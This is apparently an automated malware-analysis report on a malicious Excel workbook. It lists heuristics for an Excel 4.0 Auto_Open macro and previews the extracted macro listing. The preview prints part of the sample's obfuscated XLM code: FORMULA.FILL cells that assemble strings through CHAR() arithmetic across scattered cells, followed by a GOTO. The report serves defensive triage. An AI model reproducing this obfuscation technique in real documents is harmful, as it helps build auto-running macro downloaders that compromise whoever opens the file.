MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The critical heuristics indicate the presence of Excel 4.0 macros with an Auto_Open defined name, which is a known method for executing arbitrary commands. The macro sheet contains dangerous formula APIs, specifically 'RUN' (38) and 'risky-formula' (42), suggesting it is designed to execute a payload. The absence of document body text means the exact nature of the lure cannot be determined, but the technique is indicative of a malicious macro downloader.
Heuristics 3
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 130032 bytes |
SHA-256: 4f0bdbc593cc1c0d6805ce5c88d954f1427d76ca249c765c70175f0fe2712099 |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Sheet ' 0018 28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d Sheet!P39945 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' Sheet,T8,"",-185.00000000000000000000 ' Sheet,HF37,"",-595.00000000000000000000 ' Sheet,FU78,"",302.00000000000000000000 ' Sheet,EJ88,"",-300.00000000000000000000 ' Sheet,FO105,"",-244.00000000000000000000 ' Sheet,JA118,"",0.88571428571428567622 ' Sheet,CF172,"",0.88571428571428567622 ' Sheet,GC174,"",214.00000000000000000000 ' Sheet,BT185,"",-263.00000000000000000000 ' Sheet,HB225,"",-1.83544303797468355555 ' Sheet,EE243,"",289.00000000000000000000 ' Sheet,JM268,"",-0.08791208791208791895 ' Sheet,IT282,"",2.78571428571428558740 ' Sheet,BA307,"",2.82608695652173924628 ' Sheet,JI318,"",261.00000000000000000000 ' Sheet,JD337,"",-0.23843416370106762514 ' Sheet,EI376,"",-0.33333333333333331483 ' Sheet,BL378,"",12.32352941176470650930 ' Sheet,T430,"",1.03809523809523818194 ' Sheet,BI439,"",-137.00000000000000000000 ' Sheet,EV574,"",0.22857142857142856429 ' Sheet,FQ578,"",-169.00000000000000000000 ' Sheet,E641,"",185.25000000000000000000 ' Sheet,GZ648,"",434.75000000000000000000 ' Sheet,E685,"",-0.57931034482758625437 ' Sheet,DC719,"",0.27317073170731703824 ' Sheet,GR774,"",-264.00000000000000000000 ' Sheet,HM807,"",-378.00000000000000000000 ' Sheet,GO850,"",371.00000000000000000000 ' Sheet,K963,"",116.00000000000000000000 ' Sheet,CH1070,"",26.00000000000000000000 ' Sheet,S1083,"",-329.00000000000000000000 ' Sheet,CZ1108,"",166.00000000000000000000 ' Sheet,CA1149,"",-0.37614678899082570895 ' Sheet,DC1155,"",-0.22981366459627328158 ' Sheet,BL1156,"",-4.35999900000000017997 ' Sheet,IS1156,"FORMULA.FILL(CHAR(BV58096/FU32622)&CHAR(BO12600/O64943)&CHAR(CH64971+GF58690)&CHAR(JA13764*IL34478)&CHAR(EN11113/GH21265)&CHAR(GG16686*HS12862)&CHAR(EA51854*GA9931)&CHAR(CH64971/GJ43798)&CHAR(EJ4053*EO28439)&CHAR(EN11113*DG17568)&CHAR(JA13764+IT61821)&CHAR(EA51854*DL53052)&CHAR(BV58096*CW53933)&CHAR(EA51854/CZ6376)&CHAR(EA51854+EV43531)&CHAR(EJ4053+FL14182)&CHAR(BV58096+FW32566)&CHAR(BO12600*IH41240)&CHAR(BV58096-ID52441)&CHAR(BV58096-FM48213)&CHAR(DO44630+GE21705)&CHAR(GL60293+FS59398)&CHAR(BV58096/FB42606)&CHAR(EA51854-DR46512)&CHAR(BO12600+N1441)&CHAR(GL60293/B59317)&CHAR(CH64971*CD65391)&CHAR(BV58096-HO59711)&CHAR(EJ4053+DC45559)&CHAR(JA13764-C20744)&CHAR(DO44630/W63532)&CHAR(EJ4053-HN43792)&CHAR(GG16686/HL62983)&CHAR(BV58096-FO51108)&CHAR(JA13764*HS40740)&CHAR(EA51854-FY59420)&CHAR(EJ4053+IU40281)&CHAR(EN11113/HG51573)&CHAR(GL60293/ED44701)&CHAR(EN11113*CB37492)&CHAR(EA51854/DH60665)&CHAR(DO44630*HG50191)&CHAR(EA51854/DM49612)&CHAR(EA51854/JG41256)&CHAR(EA51854*CD16182)&CHAR(GG16686/CV57080)&CHAR(BV58096-HT33389)&CHAR(EJ4053-GW16682)&CHAR(CH64971-BU45698)&CHAR(GL60293-JR25996)&CHAR(GL60293*DV53843)&CHAR(DO44630+IJ41989)&CHAR(EA51854+IK34978)&CHAR(JA13764*BM61436)&CHAR(EA51854*JR32953)&CHAR(BV58096*FH37951)&CHAR(DO44630+HY45096)&CHAR(CH64971/P57174)&CHAR(BO12600*GP36822)&CHAR(GG16686/R25643)&CHAR(DO44630/DN61369)&CHAR(GL60293+HY61736)&CHAR(DO44630*FY45842)&CHAR(GL60293+DI27437)&CHAR(BO12600*FP61400)&CHAR(GG16686/HJ29690)&CHAR(EJ4053*BE10697)&CHAR(GG16686+GY54357)&CHAR(CH64971-JI14127)&CHAR(GL60293*U8120)&CHAR(CH64971/BK39375)&CHAR(EJ4053+A32054),DU36671)","" ' Sheet,IS1157,GOTO(HP1958),"" ' Sheet,BJ1239,"",-2.55454545454545467464 ' Sheet,FZ1347,"",-238.25000000000000000000 ' Sheet,N1441,"",376.00000000000000000000 ' Sheet,DI1460,"",-0.46330275229357797961 ' Sheet,IM1462,"",8.12500000000000000000 ' Sheet,HM1493,"",1.81034482758620685061 ' Sheet,GP1535,"",-64.00000000000000000000 ' Sheet,FG1581,"FORMULA.FILL(CHAR(HJ63793/IE30353)&CHAR(HE20869-FR7245)&CHAR(GP26128+GQ51401)&CHAR(GB51089-IF55653)&CHAR(BR58539/GJ25976) ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.